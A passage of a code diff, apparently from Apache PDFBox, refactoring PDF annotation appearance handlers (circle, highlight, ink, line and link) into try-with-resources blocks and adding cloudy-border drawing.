borderEdge.getLowerLeftY();", - "- // upper right corner", - "- float x1 = borderEdge.getUpperRightX();", - "- float y1 = borderEdge.getUpperRightY();", - "- // mid points", - "- float xm = x0 + borderEdge.getWidth() / 2;", - "- float ym = y0 + borderEdge.getHeight() / 2;", - "- // see http://spencermortensen.com/articles/bezier-circle/", - "- // the below number was calculated from sampling content streams", - "- // generated using Adobe Reader", - "- float magic = 0.55555417f;", - "- // control point offsets", - "- float vOffset = borderEdge.getHeight() / 2 * magic;", - "- float hOffset = borderEdge.getWidth() / 2 * magic;", - "- ", - "- contentStream.moveTo(xm, y1);", - "- contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", - "- contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", - "- contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", - "- contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", - "- contentStream.closePath();", - "- }", - "- ", - "- contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "+ borderEffect.getIntensity(), lineWidth, getRectangle());", - "+ cloudyBorder.createCloudyEllipse(annotation.getRectDifference());", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - " }", - "+ else", - "+ {", - "+ // the differences rectangle", - "+ setRectDifference(lineWidth);", - "+", - "+ // lower left corner", - "+ float x0 = borderEdge.getLowerLeftX();", - "+ float y0 = borderEdge.getLowerLeftY();", - "+ // upper right corner", - "+ float x1 = borderEdge.getUpperRightX();", - "+ float y1 = borderEdge.getUpperRightY();", - "+ // mid points", - "+ float xm = x0 + borderEdge.getWidth() / 2;", - "+ float ym = y0 + borderEdge.getHeight() / 2;", - "+ // see http://spencermortensen.com/articles/bezier-circle/", - "+ // the below number was calculated from sampling content streams", - "+ // generated using Adobe Reader", - "+ float magic = 0.55555417f;", - "+ // control point offsets", - "+ float vOffset = borderEdge.getHeight() / 2 * magic;", - "+ float hOffset = borderEdge.getWidth() / 2 * magic;", - "+", - "+ contentStream.moveTo(xm, y1);", - "+ contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", - "+ contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", - "+ contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", - "+ contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", - "+ contentStream.closePath();", - "+ }", - "+", - "+ contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "index 14cd725bf..095a38ad6 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "@@ -109,104 +109,101 @@ public class PDHighlightAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ PDExtendedGraphicsState r0 = new PDExtendedGraphicsState();", - "+ PDExtendedGraphicsState r1 = new PDExtendedGraphicsState();", - "+ r0.setAlphaSourceFlag(false);", - "+ r0.setStrokingAlphaConstant(annotation.getConstantOpacity());", - "+ r0.setNonStrokingAlphaConstant(annotation.getConstantOpacity());", - "+ r1.setAlphaSourceFlag(false);", - "+ r1.setBlendMode(BlendMode.MULTIPLY);", - "+ cs.setGraphicsStateParameters(r0);", - "+ cs.setGraphicsStateParameters(r1);", - "+ //TODO replace with document.getDocument().createCOSStream()", - "+ // or call new PDFormXObject(document)", - "+ PDFormXObject frm1 = new PDFormXObject(new COSStream());", - "+ PDFormXObject frm2 = new PDFormXObject(new COSStream());", - "+ frm1.setResources(new PDResources());", - "+ try (PDFormContentStream mwfofrmCS = new PDFormContentStream(frm1))", - " {", - "- PDExtendedGraphicsState r0 = new PDExtendedGraphicsState();", - "- PDExtendedGraphicsState r1 = new PDExtendedGraphicsState();", - "- r0.setAlphaSourceFlag(false);", - "- r0.setStrokingAlphaConstant(annotation.getConstantOpacity());", - "- r0.setNonStrokingAlphaConstant(annotation.getConstantOpacity());", - "- r1.setAlphaSourceFlag(false);", - "- r1.setBlendMode(BlendMode.MULTIPLY);", - "- cs.setGraphicsStateParameters(r0);", - "- cs.setGraphicsStateParameters(r1);", - "- //TODO replace with document.getDocument().createCOSStream()", - "- // or call new PDFormXObject(document)", - "- PDFormXObject frm1 = new PDFormXObject(new COSStream());", - "- PDFormXObject frm2 = new PDFormXObject(new COSStream());", - "- frm1.setResources(new PDResources());", - "- try (PDFormContentStream mwfofrmCS = new PDFormContentStream(frm1))", - "- {", - "- mwfofrmCS.drawForm(frm2);", - "- }", - "- frm1.setBBox(annotation.getRectangle());", - "- COSDictionary groupDict = new COSDictionary();", - "- groupDict.setItem(COSName.S, COSName.TRANSPARENCY);", - "- //TODO PDFormXObject.setGroup() is missing", - "- frm1.getCOSObject().setItem(COSName.GROUP, groupDict);", - "- cs.drawForm(frm1);", - "- frm2.setBBox(annotation.getRectangle());", - "- try (PDFormContentStream frm2CS = new PDFormContentStream(frm2))", - "+ mwfofrmCS.drawForm(frm2);", - "+ }", - "+ frm1.setBBox(annotation.getRectangle());", - "+ COSDictionary groupDict = new COSDictionary();", - "+ groupDict.setItem(COSName.S, COSName.TRANSPARENCY);", - "+ //TODO PDFormXObject.setGroup() is missing", - "+ frm1.getCOSObject().setItem(COSName.GROUP, groupDict);", - "+ cs.drawForm(frm1);", - "+ frm2.setBBox(annotation.getRectangle());", - "+ try (PDFormContentStream frm2CS = new PDFormContentStream(frm2))", - "+ {", - "+ frm2CS.setNonStrokingColor(color);", - "+ int of = 0;", - "+ while (of + 7 < pathsArray.length)", - " {", - "- frm2CS.setNonStrokingColor(color);", - "- int of = 0;", - "- while (of + 7 < pathsArray.length)", - "+ // quadpoints spec sequence is incorrect, correct one is (4,5 0,1 2,3 6,7)", - "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "+", - "+ // for \"curvy\" highlighting, two B\u00c3\u00a9zier control points are used that seem to have a", - "+ // distance of about 1/4 of the height.", - "+ // note that curves won't appear if outside of the rectangle", - "+ float delta = 0;", - "+ if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0 &&", - "+ Float.compare(pathsArray[of + 1], pathsArray[of + 3]) == 0 &&", - "+ Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0 &&", - "+ Float.compare(pathsArray[of + 5], pathsArray[of + 7]) == 0)", - "+ {", - "+ // horizontal highlight", - "+ delta = (pathsArray[of + 1] - pathsArray[of + 5]) / 4;", - "+ }", - "+ else if (Float.compare(pathsArray[of + 1], pathsArray[of + 5]) == 0 &&", - "+ Float.compare(pathsArray[of + 0], pathsArray[of + 2]) == 0 &&", - "+ Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0 &&", - "+ Float.compare(pathsArray[of + 4], pathsArray[of + 6]) == 0)", - " {", - "- // quadpoints spec sequence is incorrect, correct one is (4,5 0,1 2,3 6,7)", - "- // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "-", - "- // for \"curvy\" highlighting, two B\u00c3\u00a9zier control points are used that seem to have a", - "- // distance of about 1/4 of the height.", - "- // note that curves won't appear if outside of the rectangle", - "- float delta = 0;", - "- if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0 &&", - "- Float.compare(pathsArray[of + 1], pathsArray[of + 3]) == 0 &&", - "- Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0 &&", - "- Float.compare(pathsArray[of + 5], pathsArray[of + 7]) == 0)", - "- {", - "- // horizontal highlight", - "- delta = (pathsArray[of + 1] - pathsArray[of + 5]) / 4;", - "- }", - "- else if (Float.compare(pathsArray[of + 1], pathsArray[of + 5]) == 0 &&", - "- Float.compare(pathsArray[of + 0], pathsArray[of + 2]) == 0 &&", - "- Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0 &&", - "- Float.compare(pathsArray[of + 4], pathsArray[of + 6]) == 0)", - "- {", - "- // vertical highlight", - "- delta = (pathsArray[of + 0] - pathsArray[of + 4]) / 4;", - "- }", - "-", - "- frm2CS.moveTo(pathsArray[of + 4], pathsArray[of + 5]);", - "-", - "- if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0)", - "- {", - "- // horizontal highlight", - "- frm2CS.curveTo(pathsArray[of + 4] - delta, pathsArray[of + 5] + delta,", - "- pathsArray[of + 0] - delta, pathsArray[of + 1] - delta,", - "- pathsArray[of + 0], pathsArray[of + 1]);", - "- }", - "- else if (Float.compare(pathsArray[of + 5], pathsArray[of + 1]) == 0)", - "- {", - "- // vertical highlight", - "- frm2CS.curveTo(pathsArray[of + 4] + delta, pathsArray[of + 5] + delta,", - "- pathsArray[of + 0] - delta, pathsArray[of + 1] + delta,", - "- pathsArray[of + 0], pathsArray[of + 1]);", - "- }", - "- else", - "- {", - "- frm2CS.lineTo(pathsArray[of + 0], pathsArray[of + 1]);", - "- }", - "- frm2CS.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", - "- if (Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0)", - "- {", - "- // horizontal highlight", - "- frm2CS.curveTo(pathsArray[of + 2] + delta, pathsArray[of + 3] - delta,", - "- pathsArray[of + 6] + delta, pathsArray[of + 7] + delta,", - "- pathsArray[of + 6], pathsArray[of + 7]);", - "- }", - "- else if (Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0)", - "- {", - "- // vertical highlight", - "- frm2CS.curveTo(pathsArray[of + 2] - delta, pathsArray[of + 3] - delta,", - "- pathsArray[of + 6] + delta, pathsArray[of + 7] - delta,", - "- pathsArray[of + 6], pathsArray[of + 7]);", - "- }", - "- else", - "- {", - "- frm2CS.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", - "- }", - "-", - "- frm2CS.fill();", - "- of += 8;", - "+ // vertical highlight", - "+ delta = (pathsArray[of + 0] - pathsArray[of + 4]) / 4;", - " }", - "+", - "+ frm2CS.moveTo(pathsArray[of + 4], pathsArray[of + 5]);", - "+", - "+ if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0)", - "+ {", - "+ // horizontal highlight", - "+ frm2CS.curveTo(pathsArray[of + 4] - delta, pathsArray[of + 5] + delta,", - "+ pathsArray[of + 0] - delta, pathsArray[of + 1] - delta,", - "+ pathsArray[of + 0], pathsArray[of + 1]);", - "+ }", - "+ else if (Float.compare(pathsArray[of + 5], pathsArray[of + 1]) == 0)", - "+ {", - "+ // vertical highlight", - "+ frm2CS.curveTo(pathsArray[of + 4] + delta, pathsArray[of + 5] + delta,", - "+ pathsArray[of + 0] - delta, pathsArray[of + 1] + delta,", - "+ pathsArray[of + 0], pathsArray[of + 1]);", - "+ }", - "+ else", - "+ {", - "+ frm2CS.lineTo(pathsArray[of + 0], pathsArray[of + 1]);", - "+ }", - "+ frm2CS.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", - "+ if (Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0)", - "+ {", - "+ // horizontal highlight", - "+ frm2CS.curveTo(pathsArray[of + 2] + delta, pathsArray[of + 3] - delta,", - "+ pathsArray[of + 6] + delta, pathsArray[of + 7] + delta,", - "+ pathsArray[of + 6], pathsArray[of + 7]);", - "+ }", - "+ else if (Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0)", - "+ {", - "+ // vertical highlight", - "+ frm2CS.curveTo(pathsArray[of + 2] - delta, pathsArray[of + 3] - delta,", - "+ pathsArray[of + 6] + delta, pathsArray[of + 7] - delta,", - "+ pathsArray[of + 6], pathsArray[of + 7]);", - "+ }", - "+ else", - "+ {", - "+ frm2CS.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", - "+ }", - "+", - "+ frm2CS.fill();", - "+ of += 8;", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "index 3b451e5f7..d5c179254 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "@@ -59,37 +59,34 @@ public class PDInkAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ setOpacity(cs, ink.getConstantOpacity());", - "+", - "+ cs.setStrokingColor(color);", - "+ if (ab.dashArray != null)", - " {", - "- setOpacity(cs, ink.getConstantOpacity());", - "+ cs.setLineDashPattern(ab.dashArray, 0);", - "+ }", - "+ cs.setLineWidth(ab.width);", - "- cs.setStrokingColor(color);", - "- if (ab.dashArray != null)", - "- {", - "- cs.setLineDashPattern(ab.dashArray, 0);", - "- }", - "- cs.setLineWidth(ab.width);", - "+ for (float[] pathArray : ink.getInkList())", - "+ {", - "+ int nPoints = pathArray.length / 2;", - "- for (float[] pathArray : ink.getInkList())", - "+ // \"When drawn, the points shall be connected by straight lines or curves ", - "+ // in an implementation-dependent way\" - we do lines.", - "+ for (int i = 0; i < nPoints; ++i)", - " {", - "- int nPoints = pathArray.length / 2;", - "+ float x = pathArray[i * 2];", - "+ float y = pathArray[i * 2 + 1];", - "- // \"When drawn, the points shall be connected by straight lines or curves ", - "- // in an implementation-dependent way\" - we do lines.", - "- for (int i = 0; i < nPoints; ++i)", - "+ if (i == 0)", - " {", - "- float x = pathArray[i * 2];", - "- float y = pathArray[i * 2 + 1];", - "-", - "- if (i == 0)", - "- {", - "- cs.moveTo(x, y);", - "- }", - "- else", - "- {", - "- cs.lineTo(x, y);", - "- }", - "+ cs.moveTo(x, y);", - "+ }", - "+ else", - "+ {", - "+ cs.lineTo(x, y);", - " }", - "- cs.stroke();", - " }", - "+ cs.stroke();", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index ac6ef2215..00ba5c394 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -105,127 +105,131 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ setOpacity(cs, annotation.getConstantOpacity());", - "+", - "+ // Tested with Adobe Reader:", - "+ // text is written first (TODO)", - "+ // width 0 is used by Adobe as such (but results in a visible line in rendering)", - "+ // empty color array results in an invisible line (\"n\" operator) but the rest is visible", - "+ // empty content is like no caption", - "+", - "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "+", - "+ if (ab.dashArray != null)", - " {", - "- setOpacity(cs, annotation.getConstantOpacity());", - "+ cs.setLineDashPattern(ab.dashArray, 0);", - "+ }", - "+ cs.setLineWidth(ab.width);", - "- // Tested with Adobe Reader:", - "- // text is written first (TODO)", - "- // width 0 is used by Adobe as such (but results in a visible line in rendering)", - "- // empty color array results in an invisible line (\"n\" operator) but the rest is visible", - "- // empty content is like no caption", - "+ float x1 = pathsArray[0];", - "+ float y1 = pathsArray[1];", - "+ float x2 = pathsArray[2];", - "+ float y2 = pathsArray[3];", - "- boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "+ // if there are leader lines, then the /L coordinates represent", - "+ // the endpoints of the leader lines rather than the endpoints of the line itself.", - "+ // so for us, llo + ll is the vertical offset for the line.", - "+ float y = llo + ll;", - "- if (ab.dashArray != null)", - "+ String contents = annotation.getContents();", - "+ if (contents == null)", - "+ {", - "+ contents = \"\";", - "+ }", - "+", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", - "+ if (annotation.hasCaption() && !contents.isEmpty())", - "+ {", - "+ PDType1Font font = PDType1Font.HELVETICA;", - "+ // TODO: support newlines!!!!!", - "+ // see https://www.pdfill.com/example/pdf_commenting_new.pdf", - "+ float contentLength = 0;", - "+ try", - "+ {", - "+ contentLength = font.getStringWidth(annotation.getContents()) / 1000 * FONT_SIZE;", - "+", - "+ //TODO How to decide the size of the font?", - "+ // 9 seems to be standard, but if the text doesn't fit, a scaling is done", - "+ // see AnnotationSample.Standard.pdf, diagonal line", - "+ }", - "+ catch (IllegalArgumentException ex)", - " {", - "- cs.setLineDashPattern(ab.dashArray, 0);", - "+ // Adobe Reader displays placeholders instead", - "+ LOG.error(\"line text '\" + annotation.getContents() + \"' can't be shown\", ex);", - " }", - "- cs.setLineWidth(ab.width);", - "+ float xOffset = (lineLength - contentLength) / 2;", - "+ float yOffset;", - "- float x1 = pathsArray[0];", - "- float y1 = pathsArray[1];", - "- float x2 = pathsArray[2];", - "- float y2 = pathsArray[3];", - "+ // Leader lines", - "+ cs.moveTo(0, llo);", - "+ cs.lineTo(0, llo + ll + lle);", - "+ cs.moveTo(lineLength, llo);", - "+ cs.lineTo(lineLength, llo + ll + lle);", - "- // if there are leader lines, then the /L coordinates represent", - "- // the endpoints of the leader lines rather than the endpoints of the line itself.", - "- // so for us, llo + ll is the vertical offset for the line.", - "- float y = llo + ll;", - "+ String captionPositioning = annotation.getCaptionPositioning();", - "- String contents = annotation.getContents();", - "- if (contents == null)", - "+ // draw the line horizontally, using the rotation CTM to get to correct final position", - "+ // that's the easiest way to calculate the positions for the line before and after inline caption", - "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - " {", - "- contents = \"\";", - "+ cs.moveTo(ab.width, y);", - " }", - "-", - "- double angle = Math.atan2(y2 - y1, x2 - x1);", - "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "- float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", - "- if (annotation.hasCaption() && !contents.isEmpty())", - "+ else", - "+ {", - "+ cs.moveTo(0, y);", - "+ }", - "+ if (\"Top\".equals(captionPositioning))", - "+ {", - "+ // this arbitrary number is from Adobe", - "+ yOffset = 1.908f;", - "+ }", - "+ else", - " {", - "- PDType1Font font = PDType1Font.HELVETICA;", - "- // TODO: support newlines!!!!!", - "- // see https://www.pdfill.com/example/pdf_commenting_new.pdf", - "- float contentLength = 0;", - "- try", - "- {", - "- contentLength = font.getStringWidth(annotation.getContents()) / 1000 * FONT_SIZE;", - "+ // Inline", - "+ // this arbitrary number is from Adobe", - "+ yOffset = -2.6f;", - "- //TODO How to decide the size of the font?", - "- // 9 seems to be standard, but if the text doesn't fit, a scaling is done", - "- // see AnnotationSample.Standard.pdf, diagonal line", - "- }", - "- catch (IllegalArgumentException ex)", - "- {", - "- // Adobe Reader displays placeholders instead", - "- LOG.error(\"line text '\" + annotation.getContents() + \"' can't be shown\", ex);", - "- }", - "- float xOffset = (lineLength - contentLength) / 2;", - "- float yOffset;", - "- ", - "- // Leader lines", - "- cs.moveTo(0, llo);", - "- cs.lineTo(0, llo + ll + lle);", - "- cs.moveTo(lineLength, llo);", - "- cs.lineTo(lineLength, llo + ll + lle);", - "+ cs.lineTo(xOffset - ab.width, y);", - "+ cs.moveTo(lineLength - xOffset + ab.width, y);", - "+ }", - "+ if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "+ {", - "+ cs.lineTo(lineLength - ab.width, y);", - "+ }", - "+ else", - "+ {", - "+ cs.lineTo(lineLength, y);", - "+ }", - "+ cs.drawShape(ab.width, hasStroke, false);", - "- String captionPositioning = annotation.getCaptionPositioning();", - "+ // /CO entry (caption offset)", - "+ float captionHorizontalOffset = annotation.getCaptionHorizontalOffset();", - "+ float captionVerticalOffset = annotation.getCaptionVerticalOffset();", - "- // draw the line horizontally, using the rotation CTM to get to correct final position", - "- // that's the easiest way to calculate the positions for the line before and after inline caption", - "- if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - "- {", - "- cs.moveTo(ab.width, y);", - "- }", - "- else", - "- {", - "- cs.moveTo(0, y);", - "- }", - "- if (\"Top\".equals(captionPositioning))", - "- {", - "- // this arbitrary number is from Adobe", - "- yOffset = 1.908f;", - "- }", - "- else", - "- {", - "- // Inline", - "- // this arbitrary number is from Adobe", - "- yOffset = -2.6f;", - "+ // check contentLength so we don't show if there was trouble before", - "+ if (contentLength > 0)", - "+ {", - "+ cs.beginText();", - "+ cs.setFont(font, FONT_SIZE);", - "+ cs.newLineAtOffset(xOffset + captionHorizontalOffset, ", - "+ y + yOffset + captionVerticalOffset);", - "+ cs.showText(annotation.getContents());", - "+ cs.endText();", - "+ }", - "- cs.lineTo(xOffset - ab.width, y);", - "- cs.moveTo(lineLength - xOffset + ab.width, y);", - "- }", - "- if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "- {", - "- cs.lineTo(lineLength - ab.width, y);", - "- }", - "- else", - "- {", - "- cs.lineTo(lineLength, y);", - "- }", - "+ if (Float.compare(captionVerticalOffset, 0) != 0)", - "+ {", - "+ // Adobe paints vertical bar to the caption", - "+ cs.moveTo(0 + lineLength / 2, y);", - "+ cs.lineTo(0 + lineLength / 2, y + captionVerticalOffset);", - " cs.drawShape(ab.width, hasStroke, false);", - "-", - "- // /CO entry (caption offset)", - "- float captionHorizontalOffset = annotation.getCaptionHorizontalOffset();", - "- float captionVerticalOffset = annotation.getCaptionVerticalOffset();", - "-", - "- // check contentLength so we don't show if there was trouble before", - "- if (contentLength > 0)", - "- {", - "- cs.beginText();", - "- cs.setFont(font, FONT_SIZE);", - "- cs.newLineAtOffset(xOffset + captionHorizontalOffset, ", - "- y + yOffset + captionVerticalOffset);", - "- cs.showText(annotation.getContents());", - "- cs.endText();", - "- }", - "-", - "- if (Float.compare(captionVerticalOffset, 0) != 0)", - "- {", - "- // Adobe paints vertical bar to the caption", - "- cs.moveTo(0 + lineLength / 2, y);", - "- cs.lineTo(0 + lineLength / 2, y + captionVerticalOffset);", - "- cs.drawShape(ab.width, hasStroke, false);", - "- }", - "+ }", - "+ }", - "+ else", - "+ {", - "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - "+ {", - "+ cs.moveTo(ab.width, y);", - " }", - "@@ -233,27 +237,20 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - "- {", - "- cs.moveTo(ab.width, y);", - "- }", - "- else", - "- {", - "- cs.moveTo(0, y);", - "- }", - "- if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "- {", - "- cs.lineTo(lineLength - ab.width, y);", - "- }", - "- else", - "- {", - "- cs.lineTo(lineLength, y);", - "- }", - "- cs.drawShape(ab.width, hasStroke, false);", - "+ cs.moveTo(0, y);", - " }", - "-", - "- // paint the styles here and not before showing the text, or the text would appear", - "- // with the interior color", - "- boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", - "- drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", - "+ if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "+ {", - "+ cs.lineTo(lineLength - ab.width, y);", - "+ }", - "+ else", - "+ {", - "+ cs.lineTo(lineLength, y);", - "+ }", - "+ cs.drawShape(ab.width, hasStroke, false);", - " }", - "+", - "+ // paint the styles here and not before showing the text, or the text would appear", - "+ // with the interior color", - "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", - "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "index 95d6bcfeb..37fe5eb52 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "@@ -67,91 +67,88 @@ public class PDLinkAppearanceHandler extends PDAbstractAppearanceHandler", - " float lineWidth = getLineWidth();", - "- try", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "+ PDColor color = annotation.getColor();", - "+ if (color == null)", - " {", - "- PDColor color = annotation.getColor();", - "- if (color == null)", - "- {", - "- // spec is unclear, but black is what Adobe does", - "- color = new PDColor(new float[] { 0 }, PDDeviceGray.INSTANCE);", - "- }", - "- boolean hasStroke = contentStream.setStrokingColorOnDemand(color);", - "+ // spec is unclear, but black is what Adobe does", - "+ color = new PDColor(new float[] { 0 }, PDDeviceGray.INSTANCE);", - "+ }", - "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(color);", - "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "- //TODO find better way to do this. Either pass border array to", - "- // setBorderLine(), or use AnnotationBorder class", - "- if (annotation.getBorderStyle() == null)", - "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "+ //TODO find better way to do this. Either pass border array to", - "+ // setBorderLine(), or use AnnotationBorder class", - "+ if (annotation.getBorderStyle() == null)", - "+ {", - "+ COSArray border = annotation.getBorder();", - "+ if (border.size() > 3 && border.getObject(3) instanceof COSArray)", - " {", - "- COSArray border = annotation.getBorder();", - "- if (border.size() > 3 && border.getObject(3) instanceof COSArray)", - "- {", - "- contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", - "- }", - "+ contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", - " }", - "+ }", - "+", - "+ // the differences rectangle", - "+ // TODO: this only works for border effect solid. Cloudy needs a different approach.", - "+ setRectDifference(lineWidth);", - "- // the differences rectangle", - "- // TODO: this only works for border effect solid. Cloudy needs a different approach.", - "- setRectDifference(lineWidth);", - "- ", - "- // Acrobat applies a padding to each side of the bbox so the line is completely within", - "- // the bbox.", - "- PDRectangle borderEdge = getPaddedRectangle(getRectangle(),lineWidth/2);", - "+ // Acrobat applies a padding to each side of the bbox so the line is completely within", - "+ // the bbox.", - "+ PDRectangle borderEdge = getPaddedRectangle(getRectangle(),lineWidth/2);", - "- float[] pathsArray = annotation.getQuadPoints();", - "+ float[] pathsArray = annotation.getQuadPoints();", - "- if (pathsArray != null)", - "+ if (pathsArray != null)", - "+ {", - "+ // QuadPoints shall be ignored if any coordinate in the array lies outside", - "+ // the region specified by Rect.", - "+ PDRectangle rect = annotation.getRectangle();", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - " {", - "- // QuadPoints shall be ignored if any coordinate in the array lies outside", - "- // the region specified by Rect.", - "- PDRectangle rect = annotation.getRectangle();", - "- for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ if (!rect.contains(pathsArray[i * 2], pathsArray[i * 2 + 1]))", - " {", - "- if (!rect.contains(pathsArray[i * 2], pathsArray[i * 2 + 1]))", - "- {", - "- LOG.warn(\"At least one /QuadPoints entry (\" + ", - "- pathsArray[i * 2] + \";\" + pathsArray[i * 2 + 1] + ", - "- \") is outside of rectangle, \" + rect + ", - "- \", /QuadPoints are ignored and /Rect is used instead\");", - "- pathsArray = null;", - "- break;", - "- }", - "+ LOG.warn(\"At least one /QuadPoints entry (\" + ", - "+ pathsArray[i * 2] + \";\" + pathsArray[i * 2 + 1] + ", - "+ \") is outside of rectangle, \" + rect + ", - "+ \", /QuadPoints are ignored and /Rect is used instead\");", - "+ pathsArray = null;", - "+ break;", - " }", - " }", - "+ }", - "- if (pathsArray == null)", - "+ if (pathsArray == null)", - "+ {", - "+ // Convert rectangle coordinates as if it was a /QuadPoints entry", - "+ pathsArray = new float[8];", - "+ pathsArray[0] = borderEdge.getLowerLeftX();", - "+ pathsArray[1] = borderEdge.getLowerLeftY();", - "+ pathsArray[2] = borderEdge.getUpperRightX();", - "+ pathsArray[3] = borderEdge.getLowerLeftY();", - "+ pathsArray[4] = 